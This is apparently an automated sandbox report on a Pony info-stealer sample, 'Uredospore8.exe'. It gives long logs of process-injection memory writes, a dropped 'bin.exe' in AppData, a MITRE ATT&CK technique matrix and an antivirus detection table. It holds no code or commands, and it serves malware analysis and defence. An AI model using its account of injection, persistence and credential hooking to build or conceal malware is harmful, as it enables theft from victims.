Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D60000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E10000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2140000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 730000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B10000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2680000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2550000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2130000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2BA0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B20000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11D0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2ED0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2120000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 28D0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2930000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 25B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D10000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2920000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2480000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2180000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2D60000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 14D0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 26B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1380000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2840000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B30000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2F10000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 22B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2210000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: C10000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: F90000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 620000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 860000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7A0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1270000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 690000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: BD0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 5F0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 920000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10C0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 980000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2000000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: A20000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 10F0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 13E0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1450000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: CB0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B60000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B90000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1320000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: DB0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7F0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2500000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2100000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 12E0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1480000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E60000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1420000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: ED0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 29A0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2C30000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B80000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D30000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11E0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E20000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 6A0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 810000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2980000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1360000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 750000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 590000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 9D0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\dllhost.exe base: 5F0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 2140000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 1C0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 1C0000	Jump to behavior

Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Windows\SysWOW64\winver.exe winver	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process created: unknown unknown	Jump to behavior

Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194095055.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3399015831.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ctfmon.exe, 00000008.00000002.3359267400.00000128DBAF7000.00000004.00000020.00020000.00000000.sdmp, ctfmon.exe, 00000008.00000000.2226537305.00000128DBAF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd&
Source: winver.exe, 00000003.00000002.3338776042.0000000000ABC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: "vShell_TrayWndr[
Source: explorer.exe, 00000004.00000000.2192850877.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3342158192.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000004.00000002.3360217865.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193119293.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000005.00000002.3369167482.000001D63C371000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.3431957145.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979250085.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A
Source: winver.exe, 00000003.00000002.3338776042.0000000000ABC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: "vShell_TrayWnd

Source: C:\Users\user\Desktop\Uredospore8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	11 Registry Run Keys / Startup Folder	512 Process Injection	3 Rootkit	1 Credential API Hooking	1 Query Registry	Remote Services	1 Credential API Hooking	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Masquerading	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	512 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Hidden Files and Directories	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	221 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	3 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Uredospore8.exe	87%	ReversingLabs	Win32.Infostealer.Pony
